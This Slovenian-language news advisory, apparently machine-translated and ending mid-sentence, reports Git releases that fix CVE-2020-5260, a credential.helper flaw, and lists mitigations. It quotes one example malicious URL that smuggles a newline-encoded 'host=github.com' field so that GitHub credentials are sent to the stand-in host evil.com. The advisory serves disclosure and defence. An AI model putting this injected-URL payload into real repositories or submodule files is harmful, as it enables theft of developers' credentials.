Objavljeno popravne izdaje sistema za nadzor porazdeljenega vira Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 in 2.17.4, v ki je odpravilo ranljivost (CVE-2020-5260) v upravljalniku "poverilnica.pomočnik", kar povzroči, da se poverilnice pošljejo napačnemu gostitelju, ko odjemalec git dostopa do repozitorija s pomočjo posebej oblikovanega URL-ja, ki vsebuje znak za novo vrstico. Ranljivost je mogoče uporabiti za ureditev pošiljanja poverilnic iz drugega gostitelja na strežnik, ki ga nadzoruje napadalec.
Pri podajanju URL-ja, kot je »https://evil.com?%0ahost=github.com/«, bo upravljavec poverilnic pri povezovanju z gostiteljem evil.com posredoval parametre za preverjanje pristnosti, določene za github.com. Težava se pojavi pri izvajanju operacij, kot je "git clone", vključno z obdelavo URL-jev za podmodule (na primer "git submodule update" bo samodejno obdelal URL-je, podane v datoteki .gitmodules iz repozitorija). Ranljivost je najbolj nevarna v primerih, ko razvijalec klonira repozitorij, ne da bi videl URL, na primer pri delu s podmoduli ali v sistemih, ki izvajajo samodejna dejanja, na primer v skriptih za gradnjo paketov.
Za blokiranje ranljivosti v novih različicah prepovedano posredovanje znaka za novo vrstico v vseh vrednostih, ki se prenašajo prek protokola za izmenjavo poverilnic. Za distribucije lahko spremljate izdajo posodobitev paketov na straneh Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.
Kot rešitev za blokiranje težave priporočljivo Ne uporabljajte credential.helper pri dostopu do javnih skladišč in ne uporabljajte »git clone« v načinu »--recurse-submodules« z nepreverjenimi skladišči. Za popolno onemogočanje obdelovalca credential.helper, ki se ohranjanje in pridobivanje gesel iz predpomnilnik, zaščiten repozitoriji ali datoteko z gesli, lahko uporabite ukaze: